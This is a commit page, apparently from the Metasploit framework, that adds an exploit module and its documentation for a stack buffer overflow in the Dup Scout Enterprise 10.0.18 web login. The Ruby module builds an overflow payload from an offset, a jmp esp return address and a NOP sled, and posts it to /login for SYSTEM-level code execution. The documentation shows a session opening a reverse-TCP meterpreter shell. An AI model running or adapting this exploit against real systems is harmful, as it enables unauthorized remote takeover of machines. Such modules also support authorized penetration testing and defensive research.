-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #9288, Add Dup Scout Enterprise login buffer overflow
- Loading branch information
Showing
2 changed files
with
148 additions
and
0 deletions.
There are no files selected for viewing
47 changes: 47 additions & 0 deletions
47
documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,47 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| Tested on Windows 10 x64 | ||
|
|
||
| Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port. | ||
|
|
||
| [Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe) | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Install the application and set the option above to enable the web server | ||
| 2. Start msfconsole | ||
| 3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof``` | ||
| 5. Set options and payload | ||
| 6. Do: ```run``` | ||
| 7. You should get a shell. | ||
|
|
||
| ## Options | ||
|
|
||
| **RHOST** | ||
|
|
||
| IP address of the remote host running the server. | ||
|
|
||
| **RPORT** | ||
|
|
||
| Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| To obtain a shell: | ||
|
|
||
| ``` | ||
| msf > use exploit/windows/http/dup_scout_enterprise_login_bof | ||
| msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp | ||
| payload => windows/meterpreter/reverse_tcp | ||
| msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171 | ||
| rhost => 192.168.1.171 | ||
| msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252 | ||
| lhost => 192.168.1.252 | ||
| msf exploit(windows/http/dup_scout_enterprise_login_bof) > run | ||
| [*] Started reverse TCP handler on 192.168.1.252:4444 | ||
| [*] Generating exploit... | ||
| [*] Triggering the exploit now... | ||
| [*] Sending stage (179779 bytes) to 192.168.1.171 | ||
| [*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600 | ||
| ``` |
101 changes: 101 additions & 0 deletions
101
modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,101 @@ | ||
| ## | ||
| # This module requires Metasploit: https://metasploit.com/download | ||
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| class MetasploitModule < Msf::Exploit::Remote | ||
| Rank = ExcellentRanking | ||
|
|
||
| include Msf::Exploit::Remote::HttpClient | ||
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'Dup Scout Enterprise Login Buffer Overflow', | ||
| 'Description' => %q{ | ||
| This module exploits a stack buffer overflow in Dup Scout Enterprise | ||
| 10.0.18. The buffer overflow exists via the web interface during | ||
| login. This gives NT AUTHORITY\SYSTEM access. | ||
| }, | ||
| 'License' => MSF_LICENSE, | ||
| 'Author' => | ||
| [ | ||
| 'Chris Higgins', # msf Module -- @ch1gg1ns | ||
| 'sickness' # Original discovery | ||
| ], | ||
| 'References' => | ||
| [ | ||
| [ 'EDB', '43145' ] | ||
| ], | ||
| 'DefaultOptions' => | ||
| { | ||
| 'EXITFUNC' => 'thread' | ||
| }, | ||
| 'Platform' => 'win', | ||
| 'Payload' => | ||
| { | ||
| 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" | ||
| }, | ||
| 'Targets' => | ||
| [ | ||
| [ 'Dup Scout Enterprise 10.0.18', | ||
| { | ||
| 'Ret' => 0x10090c83, # jmp esp - libspp.dll | ||
| 'Offset' => 780 | ||
| } | ||
| ], | ||
| ], | ||
| 'Privileged' => true, | ||
| 'DisclosureDate' => 'Nov 14 2017', | ||
| 'DefaultTarget' => 0)) | ||
|
|
||
| register_options([Opt::RPORT(80)]) | ||
|
|
||
| end | ||
|
|
||
| def check | ||
| res = send_request_cgi({ | ||
| 'uri' => '/', | ||
| 'method' => 'GET' | ||
| }) | ||
|
|
||
| if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ | ||
| return Exploit::CheckCode::Appears | ||
| end | ||
|
|
||
| return Exploit::CheckCode::Safe | ||
| end | ||
|
|
||
| def exploit | ||
| connect | ||
|
|
||
| print_status("Generating exploit...") | ||
|
|
||
| evil = rand_text(target['Offset']) | ||
| evil << [target.ret].pack('V') | ||
| evil << make_nops(12) | ||
| evil << payload.encoded | ||
| evil << make_nops(10000 - evil.length) | ||
|
|
||
| vprint_status("Evil length: " + evil.length.to_s) | ||
|
|
||
| sploit = "username=" | ||
| sploit << evil | ||
| sploit << "&password=" | ||
| sploit << rand_text(evil.length) | ||
| sploit << "\r\n" | ||
|
|
||
| print_status("Triggering the exploit now...") | ||
|
|
||
| res = send_request_cgi({ | ||
| 'uri' => '/login', | ||
| 'method' => 'POST', | ||
| 'content-type' => 'application/x-www-form-urlencoded', | ||
| 'content-length' => '17000', | ||
| 'data' => sploit | ||
| }) | ||
|
|
||
| handler | ||
| disconnect | ||
|
|
||
| end | ||
| end |